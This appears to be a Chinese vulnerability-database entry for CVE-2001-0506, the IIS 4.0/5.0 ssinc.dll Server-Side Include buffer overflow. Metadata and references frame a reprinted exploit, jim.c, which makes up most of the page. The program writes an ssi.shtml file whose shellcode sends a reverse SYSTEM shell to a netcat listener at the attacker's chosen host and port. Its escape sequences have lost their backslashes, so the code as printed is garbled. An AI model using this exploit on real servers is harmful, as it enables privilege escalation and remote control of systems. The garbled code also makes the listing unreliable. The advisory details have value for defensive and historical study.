IIS ssinc.dll缓冲区溢出漏洞

漏洞ID	1106466	漏洞类型	缓冲区溢出
发布时间	2001-08-15	更新时间	2005-10-12
CVE编号	CVE-2001-0506	CNNVD-ID	CNNVD-200109-088
漏洞平台	Windows	CVSS评分	7.2

|漏洞来源

https://www.exploit-db.com/exploits/21071
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200109-088

|漏洞详情

IIS5.0和4.0版本ssinc.dll存在缓冲区溢出漏洞。本地用户借助超长文件名Server-SideIncludes(SSI)指令提升系统特权。该漏洞当添加文件名时触发溢出，也称为“SSI特权提升”漏洞。

|漏洞EXP

source: http://www.securityfocus.com/bid/3190/info

A vulnerability exists in Microsoft IIS 4.0 and 5.0 that could allow a user with permission to write content to the IIS server to run any code in Local System context.

/*	jim.c - IIS Server Side Include exploit by
Indigo <[email protected]> 2001

	Usage: jim <attacker host> <attacker port>

	This code has been compiled and tested
on Linux and Win32

	To exploit this vulnerability you must have
write access to the web root of the
	target web server. This program will
generate a file called ssi.shtml.
	Create a directory in the web root whose
name is 12 characters long (this is important!)
	eg. ssi_overflow then put this file into the
new directory. Start up a netcat listener:

	nc -l -p <attacker port> -vv

    	Access the file
http://target/ssi_overflow/ssi.shtml using a web
browser.
	N.B. I have had problems using Netscape
to do this but IE works fine.

	A SYSTEM shell will appear in the Netcat
session.

	You may need to hit return a few times to
get the prompt up.

	Main shellcode adapted from jill.c by dark
spyrit <[email protected]>

	Greets to:

	Morphsta, Br00t, Macavity, Jacob &
Monkfish...Not forgetting D-Niderlunds
*/

#include <stdio.h>
/* #include <windows.h> uncomment if compiling on
Win32 */

int main(int argc, char *argv[])
{

unsigned char shellcode[] =

"x3Cx21x2Dx2Dx23x69x6Ex63x6Cx75x64x65x20x66x69x6C"
"x65x3Dx22x90x90x90x90x90x90x90x90x90x90x90x90x90"
"xebx03x5dxebx05xe8xf8xffxffxffx83xc5x15x90x90x90"
"x8bxc5x33xc9x66xb9xd7x02x50x80x30x95x40xe2xfax2dx95x95"
"x64xe2x14xadxd8xcfx05x95xe1x96xddx7ex60x7dx95x95x95x95"
"xc8x1ex40x14x7fx9ax6bx6ax6ax1ex4dx1exe6xa9x96x66x1exe3"
"xedx96x66x1exebxb5x96x6ex1exdbx81xa6x78xc3xc2xc4x1exaa"
"x96x6ex1ex67x2cx9bx95x95x95x66x33xe1x9dxccxcax16x52x91"
"xd0x77x72xccxcaxcbx1ex58x1exd3xb1x96x56x44x74x96x54xa6"
"x5cxf3x1ex9dx1exd3x89x96x56x54x74x97x96x54x1ex95x96x56"
"x1ex67x1ex6bx1ex45x2cx9ex95x95x95x7dxe1x94x95x95xa6x55"
"x39x10x55xe0x6cxc7xc3x6axc2x41xcfx1ex4dx2cx93x95x95x95"
"x7dxcex94x95x95x52xd2xf1x99x95x95x95x52xd2xfdx95x95x95"
"x95x52xd2xf9x94x95x95x95xffx95x18xd2xf1xc5x18xd2x85xc5"
"x18xd2x81xc5x6axc2x55xffx95x18xd2xf1xc5x18xd2x8dxc5x18"
"xd2x89xc5x6axc2x55x52xd2xb5xd1x95x95x95x18xd2xb5xc5x6a"
"xc2x51x1exd2x85x1cxd2xc9x1cxd2xf5x1exd2x89x1cxd2xcdx14"
"xdaxd9x94x94x95x95xf3x52xd2xc5x95x95x18xd2xe5xc5x18xd2"
"xb5xc5xa6x55xc5xc5xc5xffx94xc5xc5x7dx95x95x95x95xc8x14"
"x78xd5x6bx6ax6axc0xc5x6axc2x5dx6axe2x85x6axc2x71x6axe2"
"x89x6axc2x71xfdx95x91x95x95xffxd5x6axc2x45x1ex7dxc5xfd"
"x94x94x95x95x6axc2x7dx10x55x9ax10x3ex95x95x95xa6x55xc5"
"xd5xc5xd5xc5x6axc2x79x16x6dx6ax9ax11x02x95x95x95x1ex4d"
"xf3x52x92x97x95xf3x52xd2x97x8exacx52xd2x91x55x3dx97x94"
"xffx85x18x92xc5xc6x6axc2x61xffxa7x6axc2x49xa6x5cxc4xc3"
"xc4xc4xc4x6axe2x81x6axc2x59x10x55xe1xf5x05x05x05x05x15"
"xabx95xe1xbax05x05x05x05xffx95xc3xfdx95x91x95x95xc0x6a"
"xe2x81x6axc2x4dx10x55xe1xd5x05x05x05x05xffx95x6axa3xc0"
"xc6x6axc2x6dx16x6dx6axe1xbbx05x05x05x05x7ex27xffx95xfd"
"x95x91x95x95xc0xc6x6axc2x69x10x55xe9x8dx05x05x05x05xe1"
"x09xffx95xc3xc5xc0x6axe2x8dx6axc2x41xffxa7x6axc2x49x7e"
"x1fxc6x6axc2x65xffx95x6axc2x75xa6x55x39x10x55xe0x6cxc4"
"xc7xc3xc6x6ax47xcfxccx3ex77x7bx56xd2xf0xe1xc5xe7xfaxf6"
"xd4xf1xf1xe7xf0xe6xe6x95xd9xfaxf4xf1xd9xfcxf7xe7xf4xe7"
"xecxd4x95xd6xe7xf0xf4xe1xf0xc5xfcxe5xf0x95xd2xf0xe1xc6"
"xe1xf4xe7xe1xe0xe5xdcxfbxf3xfaxd4x95xd6xe7xf0xf4xe1xf0"
"xc5xe7xfaxf6xf0xe6xe6xd4x95xc5xf0xf0xfexdbxf4xf8xf0xf1"
"xc5xfcxe5xf0x95xd2xf9xfaxf7xf4xf9xd4xf9xf9xfaxf6x95xc2"
"xe7xfcxe1xf0xd3xfcxf9xf0x95xc7xf0xf4xf1xd3xfcxf9xf0x95"
"xc6xf9xf0xf0xe5x95xd0xedxfcxe1xc5xe7xfaxf6xf0xe6xe6x95"
"xd6xf9xfaxe6xf0xddxf4xfbxf1xf9xf0x95xc2xc6xdaxd6xdexa6"
"xa7x95xc2xc6xd4xc6xe1xf4xe7xe1xe0xe5x95xe6xfaxf6xfexf0"
"xe1x95xf6xf9xfaxe6xf0xe6xfaxf6xfexf0xe1x95xf6xfaxfbxfb"
"xf0xf6xe1x95xe6xf0xfbxf1x95xe7xf0xf6xe3x95xf6xf8xf1xbb"
"xf0xedxf0x95x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x33"
"xc0xb0x90x03xd8x8bx03x8bx40x60x33xdbxb3x24x03xc3xffxe0"
"xebxb9x90x90x05x31x8cx6a"

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x66x81xECxD0x0ExE9"
"xD2xF7xFFxFF"

"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90"

"x8Bx94xF8x77x10xF3xC7xF3xC7x22x2Dx2Dx3Ex0Dx0Ax00";

FILE *fp;
unsigned short int      a_port;
unsigned long           a_host;

printf ("njim - IIS Server Side Include overflow launchernby Indigo <[email protected]> 2001nn");

printf ("To exploit this vulnerability you must have write accessn");
printf ("to the web root of the target web server.nn");
printf ("This program will generate a file called ssi.shtml.n");
printf ("Create a directory in the web root whose name isn");
printf ("12 characters long eg. ssi_overflow then put this filen");
printf ("into the new directory. Start up a netcat listener:nn");
printf ("nc -l -p <attacker port> -vvnn");
printf ("Access the file http://target/ssi_overflow/ssi.shtmln");
printf ("using a web browser. A SYSTEM shell will appear.nn");
printf ("N.B. I have had problems using Netscape to do this but IE works fine.nn");

if (argc != 3)
{
	printf ("Usage: %s <attacker host> <attacker port>n", argv[0]);
	return (1);
}

a_port = htons(atoi(argv[2]));
a_port^= 0x9595;

a_host = inet_addr(argv[1]);
a_host^=0x95959595;

shellcode[417]= (a_port) & 0xff;
shellcode[418]= (a_port >> 8) & 0xff;

shellcode[422]= (a_host) & 0xff;
shellcode[423]= (a_host >> 8) & 0xff;
shellcode[424]= (a_host >> 16) & 0xff;
shellcode[425]= (a_host >> 24) & 0xff;

fp = fopen ("./ssi.shtml","wb");

fputs (shellcode,fp);

fclose (fp);

return 0;

}

|参考资料

来源:BID
名称:3190
链接:http://www.securityfocus.com/bid/3190
来源:MS
名称:MS01-044
链接:http://www.microsoft.com/technet/security/bulletin/ms01-044.asp
来源:XF
名称:iis-ssi-directive-bo(6984)
链接:http://xforce.iss.net/static/6984.php
来源:CIAC
名称:L-132
链接:http://www.ciac.org/ciac/bulletins/l-132.shtml
来源:BUGTRAQ
名称:20011127IISServerSideIncludeBufferoverflowexploitcode
链接:http://online.securityfocus.com/archive/1/242541
来源:BUGTRAQ
名称:20010817NSFOCUSSA2001-06:MicrosoftIISssinc.dllBufferOverflowVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=99802093532233&w;=2

相关推荐: 带防火墙3Com SuperStack 3 4400 switches拒绝服务漏洞

带防火墙3Com SuperStack 3 4400 switches拒绝服务漏洞漏洞ID 1200890 漏洞类型未知发布时间 2004-12-31 更新时间 2004-12-31 CVE编号 CVE-2004-2691 CNNVD-ID CNNVD-…

文章版权归作者所有，未经允许请勿转载。

THE END